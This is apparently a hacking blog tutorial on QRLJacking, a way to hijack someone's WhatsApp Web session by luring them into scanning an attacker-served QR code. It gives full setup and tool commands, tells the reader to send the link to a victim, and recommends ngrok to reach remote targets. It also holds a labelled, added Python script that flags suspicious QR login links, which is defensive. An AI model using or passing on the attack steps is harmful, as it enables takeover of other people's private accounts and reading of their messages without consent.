QRL Jacking | Make Access On Anyone WhatsApp Without Touch | 2022 Working

The question I am asked most often by newcomers to hacking is "How to hack WhatsApp without touching the victim's device". So today I will show you how an attacker actually gains access to a victim's account without touching the device or asking the victim for any OTP, using only a social engineering technique.


Before diving in, let me clear up one thing so it is easier to understand what we are going to do. WhatsApp has end-to-end encryption, so it is nearly impossible to directly spy on or read a victim's WhatsApp messages. Different methods are used in different conditions and situations, such as MAC spoofing, OTP phishing, SS7, and some others.

QRLJacking

In this article, I'll show you a method known as QRLJacking, in which the attacker sends a malicious link to the target and gets them to scan a WhatsApp QR code, so that the attacker captures the WhatsApp Web session and can read or respond to messages.

Requirements

  • Linux/macOS (Linux Recommended)
  • Firefox Latest Version
  • Python 3.7+
I am going to show a Linux tutorial in this article. 

Steps

  • First of all, download the driver for Firefox and set it up on your Linux system using the commands given below:
wget https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz
tar -xvf geckodriver-v0.30.0-linux64.tar.gz
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
  • Now download and set up the QRLJacking tool using the commands given below:
git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py

Now the QRLJacker interface opens on your Terminal as shown in the image.

Now we are ready to perform the QRLJacking attack. Type the following commands:
use grabber/whatsapp
set port 4444
run
I am testing this tool on my localhost (you can do port forwarding for devices outside the LAN, and I recommend using ngrok for it), so my port is 4444 and the host is 0.0.0.0 in this tutorial. So in my case, the QR code link is 0.0.0.0:4444.

Now send that link to the victim. Once the victim has scanned the WhatsApp Web QR code, the attacker gets a session saved in this tool, which can later be used to access the WhatsApp Web session.
  • Press Ctrl+C to interrupt the QRLJacker tool and type the command given below:
sessions
  • The list of saved sessions is now shown in your terminal (in my case, "0"):
sessions -i 0
Now wait a few seconds; Firefox launches automatically and you get the victim's WhatsApp Web session, as shown in the image given below.
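
Seen from the defending side, the link described above (a bare host and port such as 0.0.0.0:4444, or an ngrok tunnel) is the observable part of this technique, because a genuine WhatsApp Web login QR code is only ever shown on https://web.whatsapp.com. The following is an added example, not part of the original article or of the QRLJacking project, that triages links from a chat or mail gateway log on that basis. The function names, the list of ngrok hostname suffixes and the sample links are assumptions made for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions of this example: the one origin that should ever display a
# WhatsApp Web login QR code, and hostname suffixes used by ngrok tunnels.
OFFICIAL_HOSTS = {"web.whatsapp.com"}
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok.app", ".ngrok-free.app")
DEFAULT_PORTS = {"http": 80, "https": 443}

def triage_link(link):
    """Return sorted reasons why a QR login page at this link is suspect."""
    # Links are often shared without a scheme, e.g. "0.0.0.0:4444".
    url = urlsplit(link if "://" in link else "http://" + link)
    host = (url.hostname or "").lower().rstrip(".")
    reasons = set()
    try:
        port = url.port
    except ValueError:  # port is not a number or is out of range
        port = None
        reasons.add("invalid-port")
    if port is not None and port != DEFAULT_PORTS.get(url.scheme):
        reasons.add("non-default-port")
    if url.scheme != "https":
        reasons.add("no-tls")
    if host in OFFICIAL_HOSTS and not reasons:
        return []  # the genuine origin over TLS on the default port
    reasons.add("not-official-origin")
    try:
        ipaddress.ip_address(host)
        reasons.add("ip-literal-host")
    except ValueError:
        pass  # a DNS name, not an IP literal
    if host.endswith(TUNNEL_SUFFIXES):
        reasons.add("tunnel-service")
    return sorted(reasons)

# Constructed sample links, as a chat or mail gateway might log them.
SAMPLE_LINKS = [
    "https://web.whatsapp.com/",
    "0.0.0.0:4444",
    "https://abc123.ngrok.io/",
    "https://web.whatsapp.com.example.net/",
]

def flag_links(links):
    """Map each suspect link to its reasons; clean links are omitted."""
    return {link: r for link in links if (r := triage_link(link))}

if __name__ == "__main__":
    for link, reasons in flag_links(SAMPLE_LINKS).items():
        print(f"{link}: {', '.join(reasons)}")
```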

I hope this information is helpful to you. If you still face any problems or errors, feel free to reach me. If you want to learn complete Ethical Hacking from scratch, try our "Hacking Like Watch Dogs" course and start your journey today. Thanks for reading, until next time.